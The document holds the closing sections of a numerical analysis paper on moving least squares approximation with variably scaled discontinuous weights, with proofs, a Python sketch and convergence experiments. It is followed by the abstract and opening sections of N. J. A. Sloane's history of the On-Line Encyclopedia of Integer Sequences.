Then, for \(\ell>\lvert\delta\rvert+d/p\) (equality also holds for \(p=1\)), and \(f\in\mathcal{W}^{\ell+1}_{p}(\Omega)\), the error of the MLS-VSDK approximant \(s^{\psi}_{f,X}\) can be bounded as follows:_ \[\lVert f-s^{\psi}_{f,X}\rVert_{\mathcal{L}^{2}(\Omega)}\leq Ch^{\ell+1-d(1/p-1/2)_{+}}\lVert f\rVert_{\mathcal{W}^{\ell+1}_{p}(\Omega)} \tag{16}\] Proof.: By Proposition (1), we know that (15) holds for each \(\Omega_{j}\). Let \(h_{X,\Omega_{j}}\) and \(C_{j}\) be the fill distance and a constant associated with each \(\Omega_{j}\), respectively. Then, we have \[\sum_{j=1}^{n}\lVert f-s^{\psi}_{f,X}\rVert_{L^{2}(\Omega_{j})}\leq\sum_{j=1}^{n}C_{j}h^{\ell+1-d(1/p-1/2)_{+}}_{X,\Omega_{j}}\lVert f\rVert_{W^{\ell+1}_{p}(\Omega_{j})}.\] By definition we get \(\sum_{j=1}^{n}\lVert f-s^{\psi}_{f,X}\rVert_{L^{2}(\Omega_{j})}=\lVert f-s^{\psi}_{f,X}\rVert_{\mathcal{L}^{2}(\Omega)}\). Moreover, letting \(C=\max\{C_{1},...,C_{n}\}\) and \(h=\max\{h_{X,\Omega_{1}},...,h_{X,\Omega_{n}}\}\), the right-hand side can be bounded by \[Ch^{\ell+1-d(1/p-1/2)_{+}}\lVert f\rVert_{\mathcal{W}^{\ell+1}_{p}(\Omega)}.\] Putting these together we conclude. Some remarks are in order. 1. One might notice that the error bound in (11) is indeed local (the basis functions are local by assumption), meaning that if \(f\) is less smooth in a subregion of \(\Omega\), say it possesses only \(\ell^{\prime}\leq\ell\) continuous derivatives there, then the approximant (interpolant) has order \(\ell^{\prime}+1\) in that region and this is the best we can get. On the other hand, according to (16) and thanks to the definition of the piecewise Sobolev space, only the regularity of the underlying function in the interior of each subdomain \(\Omega_{j}\) matters. In other words, as long as \(f\) possesses regularity of order \(\ell\) in subregions, say \(\Omega_{j}\) and \(\Omega_{j+1}\), the approximation order \(\ell+1\) is achievable, regardless of the discontinuities on the boundary of \(\Omega_{j}\) and \(\Omega_{j+1}\). 2. Another interesting property of the MLS-VSDK scheme is that it is indeed data dependent. To clarify, for the evaluation point \(\mathbf{x}\in\Omega_{j}\) take two data sites \(\mathbf{x}_{i},\;\mathbf{x}_{i+1}\in B(\mathbf{x},r)\) with the same distance from \(\mathbf{x}\) such that \(\mathbf{x}_{i}\in\Omega_{j}\) and \(\mathbf{x}_{i+1}\in\Omega_{j+1}\). Due to the definition (12), \(w_{\psi}(\mathbf{x},\mathbf{x}_{i+1})\) decays to zero faster than \(w_{\psi}(\mathbf{x},\mathbf{x}_{i})\), i.e., the data sites from the same subregion \(\Omega_{j}\) contribute more to the approximant (interpolant) \(s_{f,X}^{\psi}\) than those from another subregion \(\Omega_{j+1}\) beyond a discontinuity interface. On the other hand, in the classical MLS scheme this does not happen, as the weight function gives the same value to both \(\mathbf{x}_{i}\) and \(\mathbf{x}_{i+1}\). 3. We highlight that in the MLS-VSDK scheme we do not scale the polynomials, and so the polynomial space \(\mathcal{P}_{\ell}^{d}\) is not changed. We scale only the weight functions and thus, in case the given function values bear discontinuities, the basis functions \(\{\alpha_{i}(\cdot)\}_{1\leq i\leq n}\) are modified. We end this section by recalling that the MLS approximation convergence order is achievable only in the _stationary setting_, i.e., the shape parameter \(\varepsilon\) must be scaled with respect to the fill distance.
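Since the scheme only changes the weights, it can reuse the classical MLS construction sketched earlier. The following minimal sketch (one-dimensional, hypothetical names, a piecewise-constant \(\psi\) and a Wendland-type weight; an illustration under these assumptions rather than the authors' code) shows how the variably scaled discontinuous weight (13) enters the same formulas.

```python
import numpy as np

def make_psi(breaks, beta):
    """Piecewise-constant scaling function: psi(x) = beta[j] on the j-th interval
    of the partition induced by the sorted break points
    (beta must have len(breaks) + 1 entries)."""
    breaks, beta = np.asarray(breaks, float), np.asarray(beta, float)
    return lambda x: beta[np.searchsorted(breaks, np.atleast_1d(x))]

def vsdk_distance(x, centers, psi):
    """Augmented distance ||Psi(x) - Psi(x_i)|| with Psi(x) = (x, psi(x)):
    centers lying beyond a discontinuity are pushed away from x."""
    return np.sqrt((centers - x)**2 + (psi(centers) - psi(x))**2)

def mls_vsdk_approximant(x, centers, values, psi, eps, degree=1):
    """MLS with the variably scaled discontinuous weight w_psi of (13)."""
    wendland = lambda r: np.where(r < 1.0, (1.0 - r)**4 * (4.0 * r + 1.0), 0.0)
    w = wendland(eps * vsdk_distance(x, centers, psi))
    idx = np.nonzero(w > 0.0)[0]
    P = np.vander(centers[idx] - x, degree + 1, increasing=True).T
    W = np.diag(w[idx])
    e1 = np.zeros(degree + 1); e1[0] = 1.0
    alpha = W @ P.T @ np.linalg.solve(P @ W @ P.T, e1)     # (9) with w_psi
    return float(alpha @ values[idx])
```

Whether the weight is scaled or not, the shape parameter \(\varepsilon\) in such a sketch still has to be tuned to the fill distance in the stationary sense just recalled.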
It leads to _peaked basis functions_ for densely spaced data and _flat basis function_ for coarsely spaced data. In other words, the local support of the weight functions \(B(\mathbf{x},r)\), and subsequently basis functions must be tuned with regards to the \(h_{X,\Omega}\) using the shape parameter \(\varepsilon\). Consequently, this holds also in MLS-VSDK scheme, meaning that after scaling \(w_{i}\) we still need to take care of \(\varepsilon\). This is different with respect to VS(D)Ks interpolation where \(\varepsilon=1\) was kept fixed [20, 19]. ## 4 Numerical experiments In this section, we compare the performance of the MLS-VSDK with respect to the classical MLS method. In all numerical tests we fix the polynomials space up to degree 1. Considering the evaluation points as \(Z=\{z_{1},...,z_{s}\}\) we compute root mean square error and maximum error by \[RMSE=\sqrt{\frac{1}{s}\sum_{i=1}^{s}(f(z_{i})-s_{f,X}(z_{i}))^{2}},\quad MAE= \max_{z_{i}\in Z}\lvert f(z_{i})-s_{f,X}(z_{i})\rvert.\] We consider four different weight functions to verify the convergence order of \(s_{f,x}^{\psi}\) to a given \(f\), as presented in Theorem 2. 1. \(w^{1}(\mathbf{x},\mathbf{x}_{i})=(1-\varepsilon\|\mathbf{x}-\mathbf{x}_{i}\| )_{+}^{4}\cdot(4\varepsilon\|\mathbf{x}-\mathbf{x}_{i}\|{+}1)\), which is the well-known \(C^{2}\)_Wendland_ function. Since each \(w_{i}^{1}\) is locally supported on the open ball \(B(0,1)\) then it verifies the conditions required by Theorem (2). 2. \(w^{2}(\mathbf{x},\mathbf{x}_{i})=\exp(-\varepsilon\|\mathbf{x}-\mathbf{x}_{i }\|^{2})\), i.e. the Gaussian RBF. We underline that when Gaussian weight functions are employed, with decreasing separation distance of the approximation centers, the calculation of the basis functions in (9) can be badly conditioned. Therefore, in order to make the computations stable, in this case we regularize the system by adding a small multiple, say \(\lambda=10^{-8}\), of the identity to the diagonal matrix \(W\). 3. \(w^{3}(\mathbf{x},\mathbf{x}_{i})=\exp(-\varepsilon\|\mathbf{x}-\mathbf{x}_{i }\|)(15+15\|\mathbf{x}-\mathbf{x}_{i}\|{+}6\|\mathbf{x}-\mathbf{x}_{i}\|^{2}{+ }\|\mathbf{x}-\mathbf{x}_{i}\|^{3})\), that is a \(C^{6}\)_Matern_ function. 4. \(w^{4}(\mathbf{x},\mathbf{x}_{i})=(\exp\left(\varepsilon\|\mathbf{x}-\mathbf{x} _{i}\|\right)^{2}-1)^{-1}\), suggested in [12], which enjoys an additional feature which leads to interpolatory MLS, since it possesses singularities at the centers. One might notice that \(w^{2}\), \(w^{3}\) and \(w^{4}\) are not locally supported. However, the key point is that they are all decreasing with the distance from the centers and so, in practice, one can overlook the data sites that are so far from the center \(\mathbf{x}\). As a result, one generally considers a _local stencil_ containing \(n\) nearest data sites of the set \(Z\) of evaluation points. While there is no clear theoretical background concerning the stencil size, in MLS literature, one generally lets \(n=2\times Q\) (see e.g [25]). However, it might be possible that in some special cases one could reach a better accuracy using different stencil sizes. This aspect is covered by our numerical tests, which are outlined in the following. 1. In Section 4.1, we present an example in the one-dimensional framework, where the stencil size is fixed to be \(n=2\times Q\). Moreover, we consider \(w^{1}\), \(w^{2}\) and \(w^{3}\). 2. In Section 4.2, we move to the two-dimensional framework and we keep the same stencil size. 
Here, we restrict the test to the weight function \(w^{1}\) and verify Theorem (2). 3. In Section 4.3, we remain in the two-dimensional setting but the best accuracy is achieved with \(n=20\). Moreover, in addition to \(w^{2}\) and \(w^{3}\), we test the interpolatory case by considering \(w^{4}\) as weight function. 4. In Section 4.4, we present a two-dimensional experiments where the data sites have been perturbed via some white noise. We fix \(n=25\) and \(w^{2},w^{3}\) are involved. ### Example 1 On \(\Omega=(-1,1)\), we assess MLS approximant for \[f_{1}(x)=\begin{cases}e^{-x},&-1<x<-0.5\\ x^{3},&-0.5\leq x<0.5,\\ 1,&0.5\leq x<1\end{cases}\] with discontinuous scale function \[\psi(x)=\begin{cases}1,&x\in(-1,0.5)\text{ and }[0.5,1)\\ 2,&x\in[-0.5,0.5)\,.\end{cases}\] We note that the function \(\psi\) is defined only by two cases. The important fact is that has a jump as \(f_{1}\). To evaluate the approximant consider the evaluation grid of equispaced points with step size \(5.0e-4\). Tables 1 and 2 include RMSE of \(f_{1}\) approximation using \(w^{1}\) as the weight function. Again, in order to investigate the convergence rate, consider two sets of uniform and Halton nodes with the size from Table 1. In order to generalize our results to globally supported weight functions, we take into account \(w^{2}\) and \(w^{3}\), Gaussian and Matern \(C^{6}\) radial functions respectively. For the uniform data sites let the shape parameter values to be \(\boldsymbol{\varepsilon}_{GA}^{U}=[5,20,40,80,160,320]\) and \(\boldsymbol{\varepsilon}_{Mat}^{U}=[5,10,20,40,80,160]\) for \(w^{2}\) and \(w^{3}\). Our computation shows convergence rates of \(2.54\) and \(2.26\) for MLS-VSDK scheme, shown in Figure 2. Accordingly, for _Halton_ points let \(\boldsymbol{\varepsilon}_{Mat}^{H}=[5,10,20,50,200,400]\), \(\boldsymbol{\varepsilon}_{GA}^{H}=[10,20,30,50,100,200]\). The corresponding convergence rates are 2.38 and 2.33. On the other hand, using non-scaled weight functions, the standard MLS scheme can hardly reach an approximation order of 1, in both cases. ### Example 2 Consider on \(\Omega=(-1,1)^{2}\) the discontinuous function \[f_{2}(x,y)=\begin{cases}\exp(-(x^{2}+y^{2})),&x^{2}+y^{2}\leq 0.6\\ x+y,&x^{2}+y^{2}>0.6\end{cases}\] \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 9 & 0.25 & 3.58e-1 & 3.95e-1 \\ 17 & 0.5 & 1.99e-1 & 3.02e-1 \\ 33 & 1 & 3.10e-3 & 2.17e-1 \\ 65 & 2 & 8.42e-4 & 1.54e-1 \\ 257 & 4 & 5.67e-5 & 7.68e-2 \\ 513 & 8 & 1.43e-5 & 5.35e-2 \\ \hline \end{tabular} \end{table} Table 1: Comparison of the RMSE for \(f_{1}\) approximation at _uniform_ data sites. \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 9 & 0.25 & 3.53e-1 & 3.77e-1 \\ 17 & 0.5 & 1.99e-1 & 3.01e-1 \\ 33 & 1 & 3.08e-3 & 2.17e-1 \\ 65 & 2 & 8.39e-4 & 1.54e-1 \\ 257 & 4 & 5.67e-5 & 7.73e-2 \\ 513 & 8 & 1.43e-5 & 5.41e-2 \\ \hline \end{tabular} \end{table} Table 2: Comparison of the RMSE for \(f_{1}\) approximation at _Halton_ data sites. Figure 2: Convergence rates for approximating \(f_{1}\) with MLS-VSDK and MLS-Standard schemes using _uniform_ data sites (left) and _Halton_ data sites (right). 
and the discontinuous scale function \[\psi(x,y)=\begin{cases}1,&x^{2}+y^{2}\leq 0.6\\ 2,&x^{2}+y^{2}>0.6\end{cases}\] As evaluation points, we take the grid of equispaced points with mesh size \(1.00e-2\). Figure 3 shows both the _RMSE_ and _absolute error_ for the classical _MLS_ and _MLS-VSDK_ approximation of \(f_{2}\) sampled from \(1089=33^{2}\) uniform data sites taking \(w^{1}\) as the weight function. Figure 3 shows that using classical MLS, the approximation error significantly increases near the discontinuities, while using MLS-VSDK the approximant can overcome this issue. In order to investigate the convergence rate, we consider increasing sets of \(\{25,81,289,1089,4225,16641\}\) Halton and uniform points as the data sites. To find an appropriate value for the shape parameter, we fix an initial value and we multiply it by a factor of 2 at each step. Thus, let \(\mathbf{\varepsilon}=[0.25,0.5,1,2,4,8]\) be the vector of shape parameter which is modified with respect to the number of the centers in both cases of uniform and Halton data sites. The left plot of Figure 4 shows a convergence rate of 2.58 for the MLS-VSDK and only 0.66 for classical MLS methods, while these values are 2.04 and 0.70 in the right plot. Figure 3: RMSE and abs-error of \(f_{2}\) MLS (left) and MLS-VSDK (right) aproximation schemes using \(w^{1}\) weight function ### Example 3 Consider the following function \[f_{3}(x,y)=\begin{cases}2\big{(}1-\exp(-(y+0.5)^{2})\big{)},&|x|\leq 0.5,\,|y|\leq 0.5. \\ 4(x+0.8),&-0.8\leq x\leq-0.65,|y|\leq 0.8.\\ 0.5,&0.65\leq x\leq 0.8,|y|\leq 0.2\\ 0,&\text{otherwise}.\end{cases}\] defined on \(\Omega=(-1,1)^{2}\). Regarding the discontinuities of \(f_{3}\), the scale function is considered to be \[\psi(x,y)=\begin{cases}1,&|x|\leq 0.5,\,|y|\leq 0.5.\\ 2,&-0.8\leq x\leq-0.65,|y|\leq 0.8.\\ 3,&0.65\leq x\leq 0.8,|y|\leq 0.2\\ 0,&\text{otherwise}.\end{cases}\] Moreover, let the centers and evaluation points be the same as the Example 4.1. Table 3 and 4 shows RMSE of MLS-VSDK and conventional MLS approximation of \(f_{3}\) using \(w^{4}\) which interpolates the data. We underline that our experiments show that the stencil of size \(n=20\) leads to the best accuracy. Figure 5 shows **RMSE** and **Absolute Error** for Figure 4: Convergence rates for approximation of function \(f_{2}\) with MLS-VSDK and MLS standard schemes using _Uniform_ data sites (left) and _Halton_ data sites (right). \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 25 & 1 & 3.67e-1 & 1.47e+0 \\ 81 & 2 & 3.68e-1 & 8.86e-1 \\ 289 & 4 & 1.49e-2 & 7.44e-1 \\ 1089 & 8 & 4.23e-3 & 7.72e-1 \\ 4225 & 16 & 1.06e-3 & 6.64e-1 \\ 16641 & 32 & 2.65e-4 & 5.25e-1 \\ \hline \end{tabular} \end{table} Table 3: RMSE of \(f_{3}\) interpolation with _uniform_ data sites. _standard MLS_ and _MLS-VSDK approximation_ of \(f_{3}\) sampled from 1089 uniform points using \(w_{4}\) as weight function. Once again, Figure 5 shows how MLS-VSDK scheme can improve the accuracy by reducing the error near the jumps. Eventually, letting \(\mathbf{\varepsilon}_{GA}^{U}=[2,4,8,16,32,64]\) and \(\mathbf{\varepsilon}_{Mat}^{U}=[10,20,40,80,160,320]\), Figure 6 shows that \(h^{2}\) convergence is achievable. To be more precise, the rate of convergence in the left plot is 2.54 and 2.69 for \(w_{2}\) and \(w_{3}\), respectively. 
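The empirical rates quoted throughout this section are slopes of the error decay against the fill distance. The paper does not spell out the fitting procedure, so the following is only one standard way to extract such a rate (hypothetical names, using the MLS-VSDK column of Table 3 and assuming the fill distance roughly halves between consecutive node sets):

```python
import numpy as np

def empirical_rate(h, err):
    """Estimate p in err ~ C * h^p by least squares on log(err) versus log(h)."""
    p, _ = np.polyfit(np.log(np.asarray(h, float)), np.log(np.asarray(err, float)), 1)
    return p

h = [2.0**-k for k in range(2, 8)]           # fill distance halves at each refinement
rmse_vsdk = [3.67e-1, 3.68e-1, 1.49e-2, 4.23e-3, 1.06e-3, 2.65e-4]   # Table 3, MLS-VSDK
print(empirical_rate(h, rmse_vsdk))          # about 2.3 for this column
```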
For _Halton_ data sites, letting \(\mathbf{\varepsilon}_{GA}^{H}=[1,2,4,8,16,32]\) and \(\mathbf{\varepsilon}_{Mat}^{H}\) as in the uniform case, convergence rates of 2.50 and 2.73 are obtained. \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 25 & 1 & 8.84e-1 & 1.53e+0 \\ 81 & 2 & 8.95e-2 & 1.05e+0 \\ 289 & 4 & 1.42e-2 & 8.74e-1 \\ 1089 & 8 & 4.18e-3 & 6.48e-1 \\ 4225 & 16 & 1.09e-3 & 6.68e-1 \\ 16641 & 32 & 3.02e-4 & 7.07e-1 \\ \hline \end{tabular} \end{table} Table 4: RMSE of \(f_{3}\) interpolation with _Halton_ data sites. Figure 5: RMSE and absolute error of the \(f_{3}\) MLS (left) and MLS-VSDK (right) approximation (interpolation) schemes using the \(w^{4}\) weight function. ### Example 4 In applications, the discontinuities are likely to be unknown. To overcome this problem, one can employ an edge detection method to extract the discontinuities. However, in this way the approximation also depends on the performance of the edge detector [21]. In this direction, in this final experiment the location of the discontinuities is not exact. This is modeled by adding some noise drawn from the standard normal distribution multiplied by \(0.01\) to the edges of the \(\Omega_{i}\in\mathcal{P}\). We take the test function \(f_{2}\) and the data sites of Section 4.2. We fix \(n=25\), and \(\mathbf{\varepsilon}_{GA}=[0.25,0.5,1,2,4,8]\), \(\mathbf{\varepsilon}_{Mat}=[1,2,4,8,16,32]\) for both _Halton_ and _uniform_ centers. Figure 7 shows that the suggested MLS-VSDK is still able to obtain a good convergence rate when compared to classical MLS, even when the discontinuities are not known exactly. Figure 6: Convergence rates for approximation of function \(f_{3}\) with MLS-VSDK and MLS standard schemes using _Uniform_ data sites (left) and _Halton_ data sites (right). Figure 7: Convergence rates for approximation of function \(f_{2}\), based on noisy given data values, with MLS-VSDK and MLS standard schemes using _Uniform_ data sites (left) and _Halton_ data sites (right). ## 5 Conclusions To approximate a discontinuous function from scattered data values, we studied a new technique, the MLS-VSDK scheme, which applies discontinuously scaled weight functions to the MLS method. It enabled us to move toward a data-dependent scheme, meaning that MLS-VSDK is able to encode the behavior of the underlying function. We obtained a theoretical Sobolev-type error estimate which justifies why MLS-VSDK can outperform conventional MLS. The numerical experiments confirmed the theoretical convergence rates. Besides, our numerical tests showed that the suggested scheme can reach high accuracy even if the position of the discontinuities is only known approximately. **Acknowledgments.** This research has been accomplished within the Rete ITaliana di Approssimazione (RITA) and the thematic group on Approximation Theory and Applications of the Italian Mathematical Union. We also received the support of GNCS-INdAM.
2301.03149
"A Handbook of Integer Sequences" Fifty Years Later
Until 1973 there was no database of integer sequences. Someone coming across the sequence 1, 2, 4, 9, 21, 51, 127,... would have had no way of discovering that it had been studied since 1870 (today these are called the Motzkin numbers, and form entry A001006 in the database). Everything changed in 1973 with the publication of "A Handbook of Integer Sequences", which listed 2372 entries. This report describes the fifty-year evolution of the database from the "Handbook" to its present form as "The On-Line Encyclopedia of Integer Sequences" (or OEIS), which contains 360,000 entries, receives a million visits a day, and has been cited 10,000 times, often with a comment saying "discovered thanks to the OEIS".
N. J. A. Sloane
2023-01-09T02:24:47Z
http://arxiv.org/abs/2301.03149v2
# "A Handbook of Integer Sequences" Fifty Years Later ###### Abstract Until 1973 there was no database of integer sequences. Someone coming across the sequence \(1,2,4,9,21,51,127,\ldots\) would have had no way of discovering that it had been studied since 1870 (today these are called the Motzkin numbers, and form entry A001006 in the database). Everything changed in 1973 with the publication of _A Handbook of Integer Sequences_, which listed 2372 entries. This report describes the fifty-year evolution of the database from the _Handbook_ to its present form as _The On-Line Encyclopedia of Integer Sequences_ (or _OEIS_), which contains \(360,000\) entries, receives a million visits a day, and has been cited \(10,000\) times, often with a comment saying "discovered thanks to the OEIS". ## 1 Introduction Number sequences arise in all branches of science: for example, \(1,1,2,4,9,20,48,115,\ldots\) gives the number of rooted trees with \(n\) nodes (A000081,1 see also Fig. 1), and in daily life: how many pieces can you cut a pancake into with \(n\) knife-cuts? (The pieces need not all be the same size.) That one is easy: \(1,2,4,7,11,16,\ldots\), \(n(n+1)/2+1\) (A000124). But what is the answer for cutting up an (ideal) bagel or doughnut? That is a lot harder: with a sharp knife you might get a few terms, perhaps \(1,2,6,13,\ldots\), but probably not enough to guess the formula, which is \(n(n^{2}+3n+8)/6\) for \(n>0\). For that you would need to to consult the database: go to [https://oeis.org](https://oeis.org) and enter "cutting bagel", or go directly to A003600. Footnote 1: Six-digit numbers prefixed by A refer to entries in the current version of the _Handbook_, _The On-Line Encyclopedia of Integer Sequences_[13]. My fascination with these sequences began in 1964 when I was a graduate student at Cornell University in Ithaca, NY, studying neural networks. I had encountered a sequence of numbers, \(1,8,78,944,13800,\ldots\), and I badly needed a formula for the \(n\)-th term, in order to determine the rate of growth of the terms (this would indicate how long the activity in this very simple neural network would persist). I will say more about this sequence in Section 2.1. I noticed that although several books in the Cornell library contained sequences somewhat similar to mine, as far as I could tell this particular sequence was not mentioned. I expected to have to analyze many related sequences, so in order to keep track of the sequences in these books, I started recording them on \(3"\times 5"\) file cards. The collection grew rapidly as I searched though more books, and once the word got out, people started sending me sequences. Richard Guy was an enthusiastic supporter right from the start. In 1973 I formalized the collection as _A Handbook of Integer Sequences_, which was published by Academic Press (Fig. 2). It contained 2372 entries. Once the book appeared, the flood of correspondence increased, and it took twenty years to prepare the next version. Simon Plouffe helped a great deal, and in 1995 Academic Press published our sequel, _The Encyclopedia of Integer Sequences_, with 5487 entries. From this point on the collection grew even more rapidly. I waited a year, until it had doubled in size, and then put it on the Internet, calling it _The On-Line Encyclopedia of Integer Sequences_. 
In the rest of this article I will first say more about the evolution of the database: the _Handbook_ (§2.1), the 1995 _Encyclopedia_ (§2.2), the _On-Line Encyclopedia_ (§2.3), and the _OEIS Foundation_ (§2.4). The next sections describe the database itself: what sequences are--or are not--included (§3.1), how the database is used (§3.2), the layout of a typical entry (§3.3), the arrangement of the entries (§3.4), and a Fact Sheet (§3.5). The final sections describe some especially interesting sequences: Recaman's sequence (§4.1), Iteration of number-theoretic functions (§4.2), Gijswijt's sequence (§4.3), Lexicographically Earliest Sequences (§4.4), The Stepping Stones problem (§4.5), Stained glass windows (§4.6), and Other sequences I would have liked to include (§4.7). Several open questions are mentioned to which I would very much like to know the answers.

Figure 1: Left: one of 48 unlabeled rooted trees with 7 nodes (the root node is at the bottom); center: four cuts of a pancake can produce 11 pieces; right: three cuts of a bagel can produce 13 pieces.

Figure 2: Front cover of the _Handbook_. The embossed figures show side views of the two ways of folding a strip of three (blank) stamps, and the five ways of folding a strip of four stamps. The full sequence begins \(1,1,2,5,14,38,120,353,1148,3527,\ldots\), A001011. No formula is known.

Notation. \(a(n)\) denotes the \(n\)-th term of the sequence under discussion. \(\sigma(n)\) is the sum of the divisors of \(n\) (A000203).

## 2 Evolution of the database

### The _Handbook of Integer Sequences_

Once the collection had grown to a few hundred entries, I entered them on punched cards,2 which made it easier to check and sort them. The _Handbook_ was typeset directly from the punched cards. There were a few errors in the book, but almost all of them were caused by errors in the original publications. Accuracy was a primary concern in that book, as it is today in the OEIS. Footnote 2: These were never called “punch cards” (sic). To anyone who worked with them in the 1960s, “punch cards” sounds like “grill cheese” (sic) for “grilled cheese”, or “barb wire” (sic) for “barbed wire”, both of which I have recently seen in print. The book was an instant success. It was, I believe, the world's first dictionary of integer sequences (and my original title said _Dictionary_ rather than _Handbook_). Many people said "What a great idea", and wondered why no one had done it before. Martin Gardner recommended it in the _Scientific American_ of July 1974. Lynn A. Steen, writing in the _American Mathematical Monthly_ said "Incomparable, eccentric, yet very useful. Contains thousands of 'well-defined and interesting' infinite integer sequences together with references for each... If you ever wondered what comes after \(1,2,4,8,17,35,71,\ldots\), this is the place to look it up". Harvey J. Hindin, writing from New York City, exuberantly concluded a letter to me by saying: "There's the _Old Testament_, the _New Testament_, and the _Handbook of Integer Sequences_." I never did find the sequence that started it all in the literature, but I learned Polya's theory of counting, and with John Riordan's help found the answer, which appears in [16] and A000435.
A Canadian mathematician, Simon Plouffe, offered to help in preparing a revised edition of the book, and in 1995 _The Encyclopedia of Integer Sequence_, by me and Simon Plouffe, was published by Academic Press. It contained 5487 sequences, occupying 587 pages. By now punched cards were obsolete, and the entries were stored on magnetic tape. ### The _On-Line Encyclopedia of Integer Sequences_ Again, once the book appeared, many further sequences and updates were submitted from people all over the world. I waited a year, until the size of the collection had doubled, to 10000 entries, and then in 1996 I launched _The On-Line Encyclopedia of Integer Sequences_ (now usually called simply the _OEIS_) on the Internet. From 1996 until October 26, 2009, it was part of my homepage on the AT&T Labs website. Incidentally, in 2004 the database was mentioned by the Internet website _slashdot_ ("News for Nerds. Stuff that Matters"), and this brought so much traffic to my Bell Labs homepage that it briefly crashed the whole Bell Labs website. My boss was quite proud of this, since it was a rare accomplishment for the Mathematics and Statistics Research Center. ### _The OEIS Foundation_ In 2009, in order to ensure the long-term future of the database, I set up a non-profit foundation, _The OEIS Foundation Inc._, a 501(c)(3) Public Charity, whose purpose is to own, maintain and raise funds to support _The On-Line Encyclopedia of Integer Sequences_ or _OEIS_. On October 26, 2009, I transferred the intellectual property of _The On-Line Encyclopedia of Integer Sequences_ to the Foundation. A new OEIS with multiple editors was launched on November 11, 2010. Since then it has been possible for anyone in the world to propose a new sequence or an update to an existing sequence. To do this, users must first register, and then submissions are reviewed by the editors before they become a permanent part of the OEIS. Technically the OEIS is now a "moderated wiki". I started writing this article on November 11, 2022, noting that this marked twelve years of successful operation of the online OEIS, and also that the database is in its 59th year of existence. ## 3 The database today ### What sequences are included? From the very beginning the goal of the database has been to include all "interesting" sequences of integers. This is a vague definition, but some further examples may make it clearer. The database includes a huge number of familiar and unfamiliar sequences from mathematics (the prime numbers \(2,3,5,7,11,13,\ldots\), A000040; \(60,168,360,504,660,1092,\ldots\), the orders of noncyclic simple groups, A001034), computer science \((0,1,3,5,8,11,14,\ldots\), the number of comparisons needed for merge sort, A001855), physics (see "self-avoiding walks on lattices", Ising model, etc., e.g. A002921), chemistry (the enumeration of chemical compounds was one of the motivations behind Polya's theory of counting, see e.g. A000602), and not least, from puzzles and I.Q. tests \((1,8,11,69,99,96,111,\ldots\), the "strobogrammatic" numbers, guess!, or see A000787; \(4,14,23,34,42,50,59,\ldots\), the numbered stops on the New York City A train subway, A011554. That entry has links to a map and the train schedule). Sequences that have arisen in the course of someone's work--especially if published--have always been welcomed. On the other hand, sequences that have been proposed simply because they were missing from the database are less likely to be accepted. There are a few hard and fast rules. 
The sequence must be well-defined and the terms must not be time-dependent--if the next term is only known to be either 14 or 15, for instance, then the sequence must end with the last term that is known for certain. The sequence may not have any missing terms or gaps. In the case of Mersenne primes, for instance (A000043), it is common for later primes to be known before all intermediate numbers have been tested. The later primes get mentioned in comments, but they are not included as part of the main sequence until their position has been confirmed. Very short sequences and sequences that are subsequences of many other sequences are not accepted. A sequence for which the only known terms are \(2,3,5,7\) would not be accepted since it is matched by a large number of existing sequences. The definition may not involve an arbitrary but large parameter (primes ending in 1 are fine, A030430, but not primes ending in 2023).

The OEIS Wiki has a section listing additional examples of what not to submit, as well as a great deal of information about the database that I won't repeat here, such as the meaning of the various keywords, the definition of the "offset" of a sequence, descriptions of the submission and editorial processes, and a list of over \(10,000\) citations of the OEIS in the scientific literature.

Most OEIS entries give an ordered list of integers. But triangles of numbers are included by reading them row-by-row. For example, Pascal's triangle becomes \(1,\ 1,1,\ 1,2,1,\ 1,3,3,1,\ldots\), A007318. Doubly-infinite square arrays are included by reading them by antidiagonals: the standard multiplication table for positive integers becomes \(1,\ 2,2,\ 3,4,3,\ 4,6,6,4,\ldots\), A003991. Sequences of fractions are included as a linked pair giving the numerators and denominators separately (the Bernoulli numbers are A027641/A027642). Important individual real numbers are included by giving their decimal or continued fraction expansions (for \(\pi\) see A000796 and A001203). A relatively small number of sequences of nonintegral real numbers are included by rounding them to the nearest integer, or by taking floors or ceilings (the imaginary parts of the zeros of Riemann's zeta function give A002410).

Two less obvious sources for sequences are binomial coefficient identities and number-theoretic inequalities. The values of either side of the identity \[\sum_{k=0}^{n}\binom{2n}{k}^{2}\ =\ \frac{1}{2}\binom{4n}{2n}-\frac{1}{2}\binom{2n}{n}^{2}\] [9, (3.68)] give A036910. From the inequality \(\sigma(n)<n\sqrt{n}\) for \(n>2\), [12, Sect. III.1.1.b], we get the integer sequence \(\lfloor n\sqrt{n}\rfloor-\sigma(n)\), A055682. The point is that if you want to know if this inequality is known, you look up the difference sequence, and find A055682 and a reference to the proof. Many more sequences of these two types should be added to the database.

### How the database is used

The main applications of the database are in identifying sequences or in finding out the current status of a known sequence. Barry Cipra has called it a mathematical analogue of a "fingerprint file". You encounter a number sequence, and wish to know if anyone has ever come across it before. If your sequence is in the database, the reply will give a definition, the first 50 or so terms, and, when available, formulas, references, computer code for producing the sequence, links to any relevant web sites, and so on.
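If you prefer to query the database from a program rather than from the web page, a few lines of code suffice. The sketch below is illustrative only: it assumes the search URL accepts a fmt=json parameter and that each result carries "number" and "name" fields; consult oeis.org for the current interface before relying on it.

```python
# A minimal sketch (not an official client) for looking up a sequence.
import json
import urllib.request

def lookup(terms, how_many=3):
    query = ",".join(str(t) for t in terms)
    # Assumption: fmt=json returns the search results in JSON form.
    url = f"https://oeis.org/search?q={query}&fmt=json"
    with urllib.request.urlopen(url) as response:
        data = json.load(response)
    for result in (data.get("results") or [])[:how_many]:
        # Assumption: each result has an A-number ("number") and a "name".
        print(f"A{result['number']:06d}  {result['name']}")

lookup([1, 2, 5, 14, 42, 132, 429])  # should report A000108, the Catalan numbers
```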
